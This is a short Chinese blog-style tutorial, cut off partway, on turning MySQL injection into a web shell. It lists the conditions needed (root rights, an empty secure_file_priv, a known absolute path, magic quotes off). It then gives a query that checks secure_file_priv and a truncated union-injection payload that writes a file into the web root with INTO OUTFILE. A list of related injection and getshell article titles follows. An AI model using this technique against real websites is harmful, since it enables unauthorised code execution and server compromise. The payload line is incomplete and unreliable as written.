mysql注入getshell
2021-05-22 21:51
1261 查看
0x00 利用条件
- root权限
- secure_file_priv=为空或者在网站根目录下(网站根目录为d:\www,secure_file_priv=d:\也可以)
- 知道绝对路径
- gpc关闭,这个应该是php的,会转义单引号,选择路径的时候一定需要单引号
0x01 查看secure_file_priv设置
show global variables like '%secure_file_priv%';
查询结果
- 5.7.26为null,5.5.29为空
这里为NULL
0x02 联合注入写shell
select * from users where id=-1 union select 1,2,'' into outfile 'D
相关文章推荐
- 【sql注入教程】mysql注入直接getshell
- 【sql注入教程】mysql注入直接getshell
- [代码审计]青云客Cms前台有条件注入至getshell,后台xss至getshell、至弹你一脸计算器
- mysql sql注入getshell新姿势
- 一道二次注入Getshell的CTF题
- SQL注入系列之PHP+Mysql手动注入(三)----搜索型(POST/GET)
- MetInfo 3.0 PHP代码注入漏洞(getshell)
- mysql慢查询日志getshell
- PHPMYWIND4.6.6前台Refer头注入+后台另类getshell分析
- zabbix_get到shell脚本中连接mysql5.6 warning信息
- Drupal 7.31SQL注入getshell漏洞利用详解及EXP
- shell处理mysql增、删、改、查
- shell脚本中导入mysql数据&&执行mysql语句
- 运维自动化之使用PHP+MYSQL+SHELL打造私有监控系统(四)
- php+Mysql注入详解
- Linux、docker、kubernetes、MySql、Shell运维快餐
- Linux平台和Windows平台下两种自动备份MySQL数据的脚本(Shell&Bat)和步骤
- 一键安装MySQL 主从复制SHELL脚本
- 利用PHP程序设定防止MySQL注入或HTML表单滥用
- Shell脚本调用mysql语句